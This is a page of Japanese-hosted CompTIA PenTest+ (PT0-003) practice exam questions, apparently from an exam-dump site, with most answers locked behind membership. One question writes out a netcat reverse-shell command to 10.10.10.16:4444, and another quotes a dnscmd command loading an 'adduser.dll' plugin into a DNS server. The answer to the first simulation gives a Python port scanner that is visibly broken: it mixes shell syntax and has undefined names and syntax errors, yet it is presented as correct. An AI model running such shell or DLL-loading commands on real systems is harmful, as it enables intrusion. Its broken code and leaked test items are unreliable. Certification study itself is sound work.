PT0-003試験無料問題集「CompTIA PenTest+ 認定」

ページ: 1 / 13
トータル 241 問
完全版を入手する
SIMULATION
Using the output, identify potential attack vectors that should be further investigated.




正解:
See explanation below.
Explanation:
1: Null session enumeration
Weak SMB file permissions
Fragmentation attack
2: nmap
-sV
-p 1-1023
192.168.2.2
3: #!/usr/bin/python
export $PORTS = 21,22
for $PORT in $PORTS:
try:
s.connect((ip, port))
print("%s:%s - OPEN" % (ip, port))
except socket.timeout
print("%:%s - TIMEOUT" % (ip, port))
except socket.error as e:
print("%:%s - CLOSED" % (ip, port))
finally
s.close()
port_scan(sys.argv[1], ports)
A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?

解説: (GoShiken メンバーにのみ表示されます)
A tester is working on an engagement that has evasion and stealth requirements. Which of the following enumeration methods is the least likely to be detected by the IDS?

解説: (GoShiken メンバーにのみ表示されます)
A penetration tester needs to collect information over the network for further steps in an internal assessment.
Which of the following would most likely accomplish this goal?

解説: (GoShiken メンバーにのみ表示されます)
A tester compromises a target host and then wants to maintain persistent access. Which of the following is the best way for the attacker to accomplish the objective?

解説: (GoShiken メンバーにのみ表示されます)
Which of the following is the most efficient way to exfiltrate a file containing data that could be sensitive?

解説: (GoShiken メンバーにのみ表示されます)
A penetration testing team needs to determine whether it is possible to disrupt wireless communications for PCs deployed in the client's offices. Which of the following techniques should the penetration tester leverage?

解説: (GoShiken メンバーにのみ表示されます)
A penetration tester performs an assessment on the target company's Kubernetes cluster using kube-hunter.
Which of the following types of vulnerabilities could be detected with the tool?

解説: (GoShiken メンバーにのみ表示されます)
A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials. Which of the following should the tester use?

解説: (GoShiken メンバーにのみ表示されます)
During an assessment, a penetration tester runs the following command:
dnscmd.exe /config /serverlevelplugindll C:\users\necad-TA\Documents\adduser.dll Which of the following is the penetration tester trying to achieve?

解説: (GoShiken メンバーにのみ表示されます)
A penetration tester reviews a SAST vulnerability scan report. The following vulnerability has been reported as high severity:
Source file: components.ts
Issue 2 of 12: Command injection
Severity: High
Call: .innerHTML = response
The tester inspects the source file and finds the variable response is defined as a constant and is not referred to or used in other sections of the code. Which of the following describes how the tester should classify this reported vulnerability?

解説: (GoShiken メンバーにのみ表示されます)
A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application's end users. Which of the following tools should the tester use for this task?

解説: (GoShiken メンバーにのみ表示されます)
A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:
nc -e /bin/sh 10.10.10.16 4444
Which of the following would most likely bypass the filtered space character?

解説: (GoShiken メンバーにのみ表示されます)
As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands. Which of the following techniques would the penetration tester most likely use to access the sensitive data?

解説: (GoShiken メンバーにのみ表示されます)
During a penetration test, the tester gains full access to the application's source code. The application repository includes thousands of code files. Given that the assessment timeline is very short, which of the following approaches would allow the tester to identify hard-coded credentials most effectively?

解説: (GoShiken メンバーにのみ表示されます)
A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com. Which of the following is the best command for the tester to use?

解説: (GoShiken メンバーにのみ表示されます)
Which of the following can an access control vestibule help deter?

解説: (GoShiken メンバーにのみ表示されます)
With one day left to complete the testing phase of an engagement, a penetration tester obtains the following results from an Nmap scan:
Not shown: 1670 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.3 (CentOS)
3306/tcp open mysql MySQL (unauthorized)
8888/tcp open http lighttpd 1.4.32
Which of the following tools should the tester use to quickly identify a potential attack path?

解説: (GoShiken メンバーにのみ表示されます)
A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester's machine. Which of the following commands should the tester use to do this task from the tester's host?

解説: (GoShiken メンバーにのみ表示されます)
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

正解:
See explanation below.
Explanation:
Part 1 - 192.168.2.2 -O -sV --top-ports=100 and SMB vulns
Part 2 - Weak SMB file permissions
https://subscription.packtpub.com/book/networking-and-servers/9781786467454/1/ch01lvl1sec13/fingerprinting-os-and-services-running-on-a-target-host
ページ: 1 / 13
トータル 241 問